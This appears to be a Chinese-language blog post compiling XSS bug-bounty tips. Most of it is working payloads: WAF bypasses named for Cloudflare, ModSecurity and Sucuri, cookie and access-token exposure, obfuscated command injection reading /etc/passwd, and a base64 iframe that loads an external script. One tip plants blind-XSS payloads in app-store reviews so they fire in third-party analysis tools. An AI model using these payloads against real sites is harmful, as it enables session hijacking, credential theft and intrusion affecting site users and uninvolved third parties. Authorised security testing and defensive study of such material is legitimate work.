关于XSS的一些BugBountyTips

erisen · 2020 年12 月 21 日 08:25

Cross Site Scripting (XSS):

1.在没有参数的jsp页面情况下,可以尝试使用分号添加路径参数，比如这样：

http://example.com/test.jsp;');alert(1)// & perform XSS

Apache tomcat支持此功能.@0xMstar

2.@r1cs3c:当一切都无法正常工作时，我使用的一种有效的XSS绕过技术是关闭结束标记：

hhh<img src="#" onmouseenter="prompt('XSS')" gggg

3.测试购物网站时，订购商品（而不只是IDOR）后，请尝试使用订购ID参数中的XSS Payload。他们忘了在那里过滤，因为它们本来就是数字;) @imhaxormad

4.在查看.js文件时，请尝试确定代码中的薄弱环节。例如，innerHTML表示可能存在XSS。 @rvismit

5.tip for blind xss:将bxss payloads注入appstore/play商店的应用程序评论中，公司经常使用第三方应用程序评论分析应用程序。Payload可以在第三方应用程序上触发，从而使您可以访问一些敏感信息。 @armaancrockroax

6.Use this payload for xss through open redirect ：

/x:1/:///%01javascript:alert(document.cookie)/

7.您可以将输入框变成自动XSS，通过在“onfocus”属性上设置不可知的Payload，然后将其设置为“autofocus”，例如：

<input onfocus="alert(0);" autofocus>

8.采用以下Payload作为文件扩展名。当扩展名反映在html中时。有时开发人员会验证文件名，而忘记验证扩展名，@ravirajpowar：

<svg onload=alert(1)>

9.XSS Payload @LooseSecurity：

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

10.将您的XSS Payload分成两个，例如ex。姓名，有时，您最终将获得Stored XSS，@evanricafort：

<img src=x & LName: onerror=prompt(0);>

11.提示：演示XSS的影响，请不要使用alert('alert')。确定会话是存储在cookie还是本地存储中，然后将其放入弹出窗口中,@jmelika：

cookie: alert(document.cookie)
LocalStorage: alert(localStorage.getItem('access_token'))

12.XSS Payload：

Target[.]com/index.php?xss=<a href=x onfocus=alert(23) name=jj>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed cloud flare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
 "><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
 XSS
<body ontouchstart=alert(1)>
Triggers when a finger touch the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
When a finger is dragged across the screen.

13.如果您遇到未验证的重定向问题，请不要只提交它，尝试触发反射性XSS，它会使报告更加有趣。我最喜欢的Payload是,@isrikanthd：

javascript://%0aalert(1) 
javascript://%250aalert(1) in case of double encoding.

14.如果遇到注释页面，只需要在注释中打断一下就可以引起XSS，如果你们遇到此问题，请尝试以下操作,@rootpentesting：

--!><Svg/Onload=confirm(document.domain)>

15.尝试使用".xss.ht"在Google上进行搜索，可以找到其他人正在测试的地方，甚至可以透露一些私有程序，@zseano。

16.您是否遇到过一个问题，可以弹出XSS，但括号内()被过滤？这个是有效Payload，可以绕过该问题，@rootpentesting：

"onfocus="alert`1`"autofocus="

17.You can bypass a lot of #XSS filters using HTML comments.：

<!----><script>alert(0);</script>

18.我们都知道'-alert-'和'; alert();'但是我通过fuzzing最新的Firefox找到了一些替代方案,@s0md3v：

'^alert()^'
'*alert()*'
'/alert()/'

测试地址：点此访问

19.@sasi2103:假设服务器过滤了),并且您想绕过它，然后使用：

"-alert`1`,"
E.g window.location.replace("http://site.com/?x=3"); 
window.location.replace("http://site.com/?x=3"-alert`1`,")

20.If the program replace all user input in the tag (ex: ,,etc.) into blank you can add "Line Feed (%0a)" before closing tag for bypass (ex: ,)：

<?php
   echo "You say " . preg_replace("/<(.*?)>/", "", Array['x']);
?>

21.@M404ntf:XSS Bypass detection, point shot：

">'><details/open/ontoggle=confirm('XSS')> ⌝
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ⌝
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt; ⌝

22.@M404ntf:ModSecurity XSS Bypass：

{ 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
{ 2 }; "></tag><svg onload=alert(spyerror)>

23.@M404ntf:"Cloudflare" Bypass Payload：

~1: &lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
~2: &lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme"&gt;

24.@M404ntf:Sucuri { RCE }; payloads：

Smuggling RCE Payloads:
</> /???/??t+/???/??ss?? </>

Obfuscating RCE Payloads:
</> ;+cat+/e'tc/pass'wd </>
</> c\\a\\t+/et\\c/pas\\swd </>

25.@cances:on事件被过滤：

<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cHM6Ly94c3MuaGFvemkubWUvai5qcz4="></iframe>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

第一个base64，第二个url编码，类似的object标签也可以

执行js代码时关键字被拦截：

<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"\>
<script>top["al"+"ert"](`xss`);</script>
<img src=x onerror="window['al'+'ert'](0)"></img>

26.一些其他关于 XSS 技巧分享：

·更多的一些BugBountyTips可以参考这里：https://github.com/r0eXpeR/BountyTips

·https://github.com/pgaijin66/XSS-Payloads

·https://github.com/payloadbox/xss-payload-list

·一个Chrome插件.使用DevTools查找DOM XSS

·Twitter@XssPayloads

·可以在不同上下文中使用的微小XSS Payload的集合

·XSS数据接收平台（无SQL版）

·用于检测和跟踪Blind XSS，XXE和SSRF的工具包

·Cross Site Scripting (XSS) Bugbounty-Tips